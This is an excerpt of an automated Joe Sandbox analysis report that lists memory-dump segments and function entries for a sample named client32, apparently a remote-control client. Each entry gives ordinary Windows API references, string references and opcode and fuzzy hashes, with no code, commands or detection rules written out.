Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID: \\.\NSWFPDrv
API String ID: 3498533004-85019792
Opcode ID: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
Instruction ID: 037b8784f9df01d9315ef50b2b73ebd220fb6a4ab94c0d71800f6b4bfbf8c5f7
Opcode Fuzzy Hash: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
Instruction Fuzzy Hash: AAD0C971A410347AE23119AAAC4CFCBBD1DDB427B6F310360BA2DE51C4C210485182F1

Function 111585E0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 11158603

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _calloc
String ID:
API String ID: 1679841372-0
Opcode ID: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
Instruction ID: 5870c534f1e9cad6bc1b8df2b52652ede84eef16f18a371c225005308c6cd6aa
Opcode Fuzzy Hash: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
Instruction Fuzzy Hash: 81519F35600206AFDB90CF59CC80FAABBA5EF8A354F108459ED29DB354D730EA11CBA0

Function 68598FB0 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68598FE4
getsockname.WSOCK32(?,?,00000010,?,025A2E90,?), ref: 68599005
WSAGetLastError.WSOCK32(?,?,00000010,?,025A2E90,?), ref: 6859902E

Part of subcall function 68595840: inet_ntoa.WSOCK32(00000080,?,00000000,?,68598F91,00000000,00000000,685DB8DA,?,00000080), ref: 68595852

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast_memsetgetsocknameinet_ntoa
String ID:
API String ID: 3066294524-0
Opcode ID: 61aebbcc04ae2f383672ccbbd03f57b609d181a6114ae28e5313f42125617709
Instruction ID: b2f72d1da823fcf21a5055cfacb7210fa2dd74d042b233ef0eeefe23358ff26e
Opcode Fuzzy Hash: 61aebbcc04ae2f383672ccbbd03f57b609d181a6114ae28e5313f42125617709
Instruction Fuzzy Hash: A4113076E00108AFCB40DFA9DC11AFFB7B8EF89214F41456AEC05E7240E770AE148B95

Function 687E09A9 Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,687E1E32,00000001,?,00000000,00000000,00000000,?,688075BC,00000001,00000214), ref: 687E09E8
_errno.MSVCR100(?,687E1E32,00000001,?,00000000,00000000,00000000,?,688075BC,00000001,00000214), ref: 6880F3D7

Memory Dump Source

Source File: 00000007.00000002.4193839189.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true

Associated: 00000007.00000002.4193813710.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.4193909993.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.4193930667.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.4193949987.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_687d0000_client32.jbxd

Similarity

API ID: AllocateHeap_errno
String ID:
API String ID: 242259997-0
Opcode ID: 1f89951594bd3b60cb572266809bb2abce226777585caa7d062bdc3e1feaa5e2
Instruction ID: e4c67670417cf6b0033574537d7cbcb60238b043d770846b69ba147b02f5b43d
Opcode Fuzzy Hash: 1f89951594bd3b60cb572266809bb2abce226777585caa7d062bdc3e1feaa5e2
Instruction Fuzzy Hash: 790192312852169FFB049E2DDD48B6B3798BFA2760F418929B8259B1D0DBB0D440CBA0

Function 1110E3C0 Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
__wsplitpath.LIBCMT ref: 1110E405
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DirectoryInformationSystemVolume__wsplitpath
String ID:
API String ID: 395646034-0
Opcode ID: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
Instruction ID: 49ee09b274793d3f37b85f9af0a235e2207b6666fb7fe841f2bc02eb00c982ac
Opcode Fuzzy Hash: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
Instruction Fuzzy Hash: 5911A135A4021DABEB14CB94CC42FEDF378AB48B04F1040D5E724AB1C0E7B02A08CB65

Function 1109DCF0 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18

Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,74DEF550,?,00000000), ref: 1109DC58
Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
Part of subcall function 1109DC20: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0047F768,0047F768,0047F768,0047F768,0047F768,0047F768,0047F768,111EAB1C,?,00000001,00000001), ref: 1109DCA0
Part of subcall function 1109DC20: EqualSid.ADVAPI32(?,0047F768,?,00000001,00000001), ref: 1109DCB3

CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
String ID:
API String ID: 2256153495-0
Opcode ID: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
Instruction ID: c89a6c7b331b2a9e52fe7b246e4b03132f6c449d5caf40a75acaa97b60e2562d
Opcode Fuzzy Hash: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
Instruction Fuzzy Hash: 71F08CB5E42319EFC705DFE5D8849AEFBB8AF09308750847DEA1AC3204D631DA009F61

Function 1110C6B0 Relevance: 3.8, APIs: 3, Instructions: 57COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(111EC8B8,CF3D35D0,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C6E4
EnterCriticalSection.KERNEL32(111EC8B8,CF3D35D0,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C700
LeaveCriticalSection.KERNEL32(111EC8B8,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C748

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInitializeLeave
String ID:
API String ID: 3991485460-0
Opcode ID: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
Instruction ID: 5cbfd62ab707a984bc8f9840cb1ce5c13d1e9dd1c8f4cb6af8017bccb6afb893
Opcode Fuzzy Hash: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
Instruction Fuzzy Hash: DC117375A01B25AFE7029F89CE88F9EFBE8EB45624F40416AF911A3740D73498008B91

Function 11067F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068012

Strings

??CTL32.DLL, xrefs: 11067FD3

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ??CTL32.DLL
API String ID: 1029625771-2984404022
Opcode ID: 615eeb59653b4affda5163e153b258362ea43afe93827aa1a1d90bc76bfb298e
Instruction ID: 32b9202a4fc65b1dacbe7aa8c831b48159e18a8703659cb8720647e729342126
Opcode Fuzzy Hash: 615eeb59653b4affda5163e153b258362ea43afe93827aa1a1d90bc76bfb298e
Instruction Fuzzy Hash: C431D371A04655DFE711CF59DC40F5AF7E8FB45724F0086BAE9199B380E731A900CB91

Function 110267B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetDriveTypeA.KERNEL32(?), ref: 110267DD

Strings

?:\, xrefs: 110267D2

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DriveType
String ID: ?:\
API String ID: 338552980-2533537817
Opcode ID: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
Instruction ID: 38449473f5ed5767ddcbcf892a2d2af3f0dceeb725c671958e56149c4f091727
Opcode Fuzzy Hash: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
Instruction Fuzzy Hash: 6DF0B460C043D63AEB22CE60A84459ABFD85F062A8F54C8DEDCDC46941E1B6E188C791

Function 110EAED0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON

Download Yara Rule

APIs

Part of subcall function 110EAE90: RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,CF3D35D0), ref: 110EAE9D

RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EB538,?,?,00020019,CF3D35D0), ref: 110EAEEC

Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B

Strings

Error %d Opening regkey %s, xrefs: 110EAEFA

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenwvsprintf
String ID: Error %d Opening regkey %s
API String ID: 1772833024-3994271378
Opcode ID: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
Instruction ID: 09eb28a66f6e9341cb3e48657c7c8114af41280c10e95afb1c39da68eab11178
Opcode Fuzzy Hash: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
Instruction Fuzzy Hash: BFE092BA701319BFD210D65A9C88FABBB5DDBC96A4F014025FA0897341D971EC4082B0

Function 1110C4A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 1110C4D2

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

..\ctl32\Refcount.cpp, xrefs: 1110C4BC

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_memsetwsprintf
String ID: ..\ctl32\Refcount.cpp
API String ID: 4120431230-2363596943
Opcode ID: bce583019a6b6f5728b65a1f3c6ed1eb728a479e52f27e907b7c6efb70f27a12
Instruction ID: fb683ad4537a29421ebad94ea8a5926084d263391e6db2c8366a4dac22183ed0
Opcode Fuzzy Hash: bce583019a6b6f5728b65a1f3c6ed1eb728a479e52f27e907b7c6efb70f27a12
Instruction Fuzzy Hash: D4E08C3BE4013932C1A1248A7C42FABFA5C4B92AA8F050021FD18A6211A545660181E6

Function 110EAE90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,CF3D35D0), ref: 110EAE9D

Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B

Strings

Error %d closing regkey %x, xrefs: 110EAEAD

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Closewvsprintf
String ID: Error %d closing regkey %x
API String ID: 843752472-892920262
Opcode ID: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
Instruction ID: 92a7a0ee5207e3186e072fae0831ab025553d10eab44dfd4ffee7659da325c5a
Opcode Fuzzy Hash: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
Instruction Fuzzy Hash: FEE08675602152DFD335CA1EAC58F67B6D99FC9710F12456DB841D3300DB70C8418660

